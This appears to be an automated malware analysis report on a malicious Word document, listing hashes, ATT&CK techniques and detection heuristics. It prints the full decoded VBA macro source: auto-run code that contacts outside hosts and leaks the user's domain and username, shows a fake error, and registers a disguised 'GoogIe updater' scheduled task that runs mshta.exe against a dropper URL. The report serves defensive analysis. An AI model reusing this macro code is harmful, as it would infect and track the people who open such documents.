Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 031b1af6e54cca10…

MALICIOUS

Office (OLE)

183.5 KB Created: 2021-05-06 10:26:00 Authoring application: Microsoft Office Word First seen: 2021-06-28
MD5: 9f238e4d00f30cdf9e124374631508b5 SHA-1: 9bcab758eb81068f89163e579dba986a7e7b7814 SHA-256: 031b1af6e54cca103f6efa2838f3fa3f39bc3e34abab65ec4dc96682d7458536
314 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute upon opening the document. The AutoOpen macro attempts to download a file from 'https://tme.s03mdn.net/documents/img01.png' using Internet Explorer and displays a fake error message to the user. This indicates a downloader functionality, likely to fetch and execute a second-stage payload. The use of VBA macros and the download attempt are consistent with a macro-based downloader.

Heuristics 12

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        Set Action = taskDefinition.Actions.Create(ActionTypeExec)
    Action.Path = "mshta.exe"
    Action.Arguments = drp
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Private Sub LoadImg()
    Set IE = CreateObject("InternetExplorer.Application")
    IE.Visible = False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub AutoOpen()
    Auto_Open
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Sub Workbook_Open()
    Auto_Open
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub AutoOpen()
    Auto_Open
    Hide
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        IE.Visible = False
    IE.Navigate "https://tme.s03mdn.net/documents/img01.png", "", "", "", "User-Agent: Mozilla/5.0 (" & Environ("USERDOMAIN") & "\" & Environ("USERNAME") & ") (Windows NT 6.1; Trident/7.5;) like Gecko"
    Do While IE.Busy
  • Reference to mshta.exe high SC_STR_MSHTA
    Reference to mshta.exe
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://tme.s03mdn.net/documents/img01.png� In document text (OLE body)
    • https://es.cloud-datatransfer.com/home/favicon.ico�In document text (OLE body)
    • https://es.cloud-datatransfer.com/documents/default/index.htmlIn document text (OLE body)
    • https://tme.s03mdn.net/documents/img01.pngIn document text (OLE body)
    • https://es.cloud-datatransfer.com/home/favicon.icoIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5882 bytes
SHA-256: a0e86fcd6b6dd2eff55a0cb3d10fb4a4122e50f516ee5678df37f8b15625e152
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    Auto_Open
    Hide
End Sub
Sub Workbook_Open()
    Auto_Open
    Hide
End Sub
Sub Auto_Open()
    On Error Resume Next
    LoadImg
    Hide
    Load F1
    Unload F1
End Sub
Private Sub LoadImg()
    Set IE = CreateObject("InternetExplorer.Application")
    IE.Visible = False
    IE.Navigate "https://tme.s03mdn.net/documents/img01.png", "", "", "", "User-Agent: Mozilla/5.0 (" & Environ("USERDOMAIN") & "\" & Environ("USERNAME") & ") (Windows NT 6.1; Trident/7.5;) like Gecko"
    Do While IE.Busy
         DoEvents
    Loop
    IE.Quit
    Set IE = Nothing
    MsgBox "Su version de Microsoft Word no es compatible con este documento. Por favor, vuelva a intentarlo mas tarde. [ERROR CODE -143863]"
End Sub
Sub Hide()
    With ActiveDocument
        .Shapes(1).Visible = False
    End With
End Sub


Attribute VB_Name = "M1"
Private Sub LoadImg()
    Set IE = CreateObject("InternetExplorer.Application")
    IE.Visible = False
    IE.Navigate "https://es.cloud-datatransfer.com/home/favicon.ico", "", "", "", "User-Agent: Mozilla/5.0 (" & Environ("USERDOMAIN") & "\" & Environ("USERNAME") & ") (Windows NT 6.1; Trident/7.5;) like Gecko"
    Do While IE.Busy
         DoEvents
    Loop
    IE.Quit
    Set IE = Nothing
End Sub
Sub Hide()
    With ActiveDocument
        .Shapes(1).Visible = False
    End With
End Sub


Attribute VB_Name = "F1"
Attribute VB_Base = "0{9D977F62-D292-480F-BC8A-DBE5CD3457F6}{1DF173F6-D535-48F2-91EE-D8606A188815}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
    
    ' Dropper URL
    Dim drp
    drp = "https://es.cloud-datatransfer.com/documents/default/index.html"

    ' A constant that specifies a daily trigger
    Const TriggerTypeDaily = 2
    ' A constant that specifies an executable action
    Const ActionTypeExec = 0
    
    Set service = CreateObject("Schedule.Service")
    Call service.Connect
    
    Dim rootFolder
    Set rootFolder = service.GetFolder("\")
    
    ' Create the task
    Dim taskDefinition
    Set taskDefinition = service.NewTask(0)
    
    ' Define information about the task
    Dim regInfo
    Set regInfo = taskDefinition.RegistrationInfo
    regInfo.Description = "GoogIe products auto-updater"
    regInfo.Author = "GoogIe"
    
    ' Set the task configuration
    Dim settings
    Set settings = taskDefinition.settings
    settings.Enabled = True
    settings.StartWhenAvailable = True
    settings.Hidden = False
    settings.DisallowStartIfOnBatteries = False
    settings.AllowDemandStart = True
    settings.RunOnlyIfNetworkAvailable = True
    settings.RunOnlyIfIdle = False
    settings.StopIfGoingOnBatteries = False
    settings.WakeToRun = True
    
    ' Create a daily trigger at 10:00:00. Time format: YYYY-MM-DDTHH:MM:SS
    Dim triggers
    Set triggers = taskDefinition.triggers
    Dim trigger
    Set trigger = triggers.Create(TriggerTypeDaily)
    
    Dim startTime
    startTime = "2006-05-02T10:00:00"  'Task runs at 10:00 AM
    
    trigger.StartBoundary = startTime
    trigger.DaysInterval = 1
    trigger.ID = "Daily"
    trigger.Enabled = True
    
    ' Create the action for the task to execute
    Dim Action
    Set Action = taskDefinition.Actions.Create(ActionTypeExec)
    Action.Path = "mshta.exe"
    Action.Arguments = drp
    
    ' Register the task.
    Call rootFolder.RegisterTaskDefinition( _
        "GoogIe updater", taskDefinition, 6, , , 3)

    F1.Hide
End Sub

Private Sub UserForm_Terminate()

    ' A constant that specifies a daily trigger
    Const TriggerTypeRegister = 7
    ' A constant that specifies an executable action
    Const ActionTypeExec = 0
    
    Set service = CreateObject("Schedule.Service")
    Call service.Connect
    
    Dim rootFolder
    Set rootFolder = service.GetFolder("\")
    
    ' Create the task
    Dim taskDefinition
    Set taskDefinition = service.NewTask(0)
    
    ' Define information about the task
    Dim regInfo
    Set regInfo = taskDefinition.RegistrationInfo
    regInfo.Description = "GoogIe products auto-updater"
    regInfo.Author = "GoogIe"
    
    ' Set the task configuration
    Dim settings
    Set settings = taskDefinition.settings
    settings.Enabled = True
    settings.StartWhenAvailable = True
    settings.Hidden = False
    settings.DisallowStartIfOnBatteries = False
    settings.AllowDemandStart = True
    settings.RunOnlyIfNetworkAvailable = True
    settings.RunOnlyIfIdle = False
    settings.StopIfGoingOnBatteries = False
    settings.WakeToRun = True
    
    ' Create a daily trigger at 10:00:00. Time format: YYYY-MM-DDTHH:MM:SS
    Dim triggers
    Set triggers = taskDefinition.triggers
    Dim trigger
    Set trigger = triggers.Create(TriggerTypeRegister)
    
    Dim startTime
    startTime = "2006-05-02T10:00:00"  'Task runs at 10:00 AM
    
    trigger.StartBoundary = startTime
    trigger.ID = "Now"
    trigger.Enabled = True
    
    ' Create the action for the task to execute
    Dim Action
    Set Action = taskDefinition.Actions.Create(ActionTypeExec)
    Action.Path = "SCHTASKS.EXE"
    Action.Arguments = "/RUN /TN ""GoogIe updater"""
    
    ' Register the task.
    Call rootFolder.RegisterTaskDefinition( _
        "Starter", taskDefinition, 6, , , 3)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.